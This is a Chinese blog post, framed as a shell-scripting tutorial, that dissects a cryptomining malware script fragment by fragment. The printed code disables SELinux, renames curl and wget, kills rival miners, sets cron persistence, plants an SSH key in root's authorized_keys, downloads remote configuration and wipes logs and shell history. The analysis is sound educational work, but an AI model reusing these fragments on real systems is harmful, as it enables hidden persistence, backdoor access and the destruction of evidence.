Linux的腳本編寫方法有哪些

code 1

#!/bin/sh

腳本的第一行,看起來是一行注釋,但其實并不是。它規定了接下來的腳本,將要采用哪一個SHELL執行。像我們平常用的bash、zsh等,屬于sh的超集,這個腳本使用sh作為執行的shell,具有更好的可移植性。

code 2

setenforce 0 2>dev/NULL echo SElinux=disabled > /etc/sysconfig/selinux 2>/dev/null

setenforce是Linux的selinux防火墻配置命令,執行setenforce 0 ?表示關閉selinux防火墻。2代表的是標準錯誤(stderr)的意思。因此,可使用重定向符將命令的錯誤輸出重定向到/dev/null設備。這個設備是一個虛擬設備,意思是什么都不干。非常適合靜悄悄的干壞事。

code 3

sync && echo 3 >/proc/sys/vm/drop_caches

腳本貼心的幫我們釋放了一些內存資源,以便獲取更多的資源進行挖礦。

眾所周知,Linux系統會隨著長時間的運行,會產生很多緩存,清理方式就是寫一個數字到drop_caches文件里,這個數字通常為3。執行sync命令后,系統將所有未寫入的緩沖區寫入磁盤,因此可以安全地釋放緩存。

code 4

crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/cURL" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur

沒錯,上面這些語句就是完成了一些普通的操作。值得注意的是,它把我們的一些常用命令,使用mv命令給重名了。這在執行命令的時候,就會顯得分成功能的蛋疼。這腳本已經更改了計算機的一些文件,屬于犯罪的范疇了。

腳本為了復用一些功能,抽象出了很多的函數。我們直接跳到main函數的執行,然后看一下這個過程。

code 5

首先是kill_miner_proc函數。代碼很長,就不全部貼出來了。

kill_miner_proc() {     ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9   ...     pkill -f biosetjenkins     pkill -f Loopback     ...     crontab -r     rm -rf /var/spool/cron/*

挖礦領域是一個相愛相殺的領域。這個方法首先使用ps、grep、kill一套組合,干掉了同行的挖礦腳本,然后停掉了同行的cron腳本,黑吃黑的感覺。

在這段腳本里,使用了pkill命令。這個命令會終止進程,并按終端號踢出用戶,比較暴力。

code 6

接下來執行的是kill_sus_proc函數。

ps axf -o "pid"|while read procid do ... done

ps加上o參數,可以指定要輸出的列,在這里只輸出的進程的pid,然后使用read函數,對procid進行遍歷操作。

code 7

ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then ... fi

上面就是遍歷操作過程了,我們可以看到if語句的語法。其中$?指的是上一個命令的退出狀態。0表示沒有錯誤,其他任何值表明有錯誤。-ne是不等于的意思,意思就是能夠匹配到tmp這個字符串

code 8

ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do ... done

呵呵,上面又來了一次循環遍歷。不過這次針對的目標,是cpu使用超過40%的進程。對于閱讀過xjjdog的awk分析的同學來說,他們應該非常熟悉這個命令。這就有點狠了:影響我挖礦的進程,都得死!

相煎何太急。

code 9

再接下來,腳本針對不同的用戶屬性,進行了不同的操作。

首先是root用戶。通過判斷是否存在$rtdir文件,來確定是否是root權限。

chattr -i /etc/sysupdate* chattr -i /etc/config.json* chattr -i /etc/update.sh* chattr -i /root/.ssh/authorized_keys* chattr -i /etc/networkservice

使用chattr命令將一些關鍵文件設置為只讀屬性,限制其隨意更改,這確實很嚴厲。然后,操作cron程序,把腳本的更新服務加入到定時中。

就是下面這段腳本。

code 10

if [ ! -f "/usr/bin/crontab" ] then     echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} else     [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - fi

注意[[ $cont =~ “update.sh” ]]這以小段代碼,怪異的很。在shell中內置的一個命令是[[ ]],它支持字符串模式匹配。=~的使用甚至支持shell的正則表達式,非常強大。它的輸出結果是一個bool類型,所以能夠使用||進行拼接。

而后面的單小括號 (),是的是一個命令組,括號中多個命令之間用分號隔開,最后一個命令可以沒有分號;和`cmd`的效果基本是一樣的。

code 11

搞完了定時任務,就要配置ssh自動登錄了,通過把公鑰追加到信任列表中就可以。

chmod 700 /root/.ssh/ echo >> /root/.ssh/authorized_keys chmod 600 root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/

code 12

說曹操曹操就到,下面的腳本就使用了“進行操作。

filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` if [ "$filesize_config" -ne "$config_size" ] then     pkill -f sysupdate     rm /etc/config.json     downloads $config_url /etc/config.json $config_url_backup else     echo "no need download" fi

如果檢測到配置文件大小不同,則進行重新下載,這個過程需要進行一系列復雜的操作。這就用到了downloads函數。

shell中的函數,看起來比較怪異,后面的參數傳遞,就像是腳本傳遞一樣,傳送給函數。

code 13

downloads $config_url /etc/config.json $config_url_backup

這句話,就傳遞了三個參數。

當然,文件要從遙遠的服務器上下載。域名是.de結尾的,證明是個德國的域名,其他的我們一無所知。

downloads() {     if [ -f "/usr/bin/curl" ]     then     echo $1,$2         http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`         if [ "$http_code" -eq "200" ]         then             curl --connect-timeout 10 --retry 100 $1 > $2         elif [ "$http_code" -eq "405" ]         then             curl --connect-timeout 10 --retry 100 $1 > $2         else             curl --connect-timeout 10 --retry 100 $3 > $2         fi     elif [ -f "/usr/bin/cur" ]     then         http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`         if [ "$http_code" -eq "200" ]         then             cur --connect-timeout 10 --retry 100 $1 > $2         elif [ "$http_code" -eq "405" ]         then             cur --connect-timeout 10 --retry 100 $1 > $2         else             cur --connect-timeout 10 --retry 100 $3 > $2 fi     elif [ -f "/usr/bin/wget" ]     then         wget --timeout=10 --tries=100 -O $2 $1         if [ $? -ne 0 ]     then         wget --timeout=10 --tries=100 -O $2 $3         fi     elif [ -f "/usr/bin/wge" ]     then         wge --timeout=10 --tries=100 -O $2 $1         if [ $? -eq 0 ]         then             wge --timeout=10 --tries=100 -O $2 $3         fi     fi }

我覺得這段代碼作者的水平沒有得到很好的體現,代碼寫得又臭又長。應該是趕工期,沒有想好代碼的復用,才會寫的這么有失水準。

我們上面說到,腳本改了幾個命令的名字,其中就有curl。這個命令是如此的強大,以至于腳本的作者都忍不住加了不少參數。

  • -I 是用來測試http頭信息

  • -m 設置最大傳輸時間

  • -o 指定保持的文件名。這里是/dev/null,呃呃呃

  • -s 靜默模式。不輸出任何東西

  • –connect-timeout 連接超時時間

  • –retry 重試次數,好狠100次

如果沒有curl?那就使用替補的wget,套路都是一樣的。

code 14

接下來是一系列相似的操作,最后,對iptables一批操作。

iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -I INPUT -s 43.245.222.57 -j DROP service iptables reload

code 15

細心的腳本編寫者,還使用命令清理了操作日志。

history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history

? 版權聲明
THE END
喜歡就支持一下吧
點贊12 分享